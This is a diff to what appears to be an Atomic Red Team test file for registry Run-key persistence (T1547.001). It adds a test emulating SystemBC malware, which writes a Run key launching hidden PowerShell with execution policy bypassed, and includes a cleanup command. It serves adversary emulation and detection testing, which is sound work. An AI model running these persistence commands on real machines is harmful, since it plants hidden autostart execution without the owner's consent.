diff --git a/atomics/T1547.001/T1547.001.yaml b/atomics/T1547.001/T1547.001.yaml
index 3c41bed1..c2475081 100644
--- a/atomics/T1547.001/T1547.001.yaml
+++ b/atomics/T1547.001/T1547.001.yaml
@@ -151,3 +151,27 @@ atomic_tests:
     command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f  
     cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f
     name: command_prompt
+
+- name: SystemBC Malware-as-a-Service Registry
+  description: |
+      This Atomic will create a registry key called socks5_powershell for persistance access
+      https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c
+  supported_platforms:
+  - windows
+  input_arguments:
+    reg_key_value:
+      description: Thing to Run
+      type: Path
+      default: powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File
+    reg_key_path:
+      description: Path to registry key to update
+      type: Path
+      default: HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
+  executor:
+    command: |
+      $RunKey = "#{reg_key_path}"
+      Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}"
+    cleanup_command: |
+      Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell" -Force -ErrorAction Ignore
+    name: powershell
+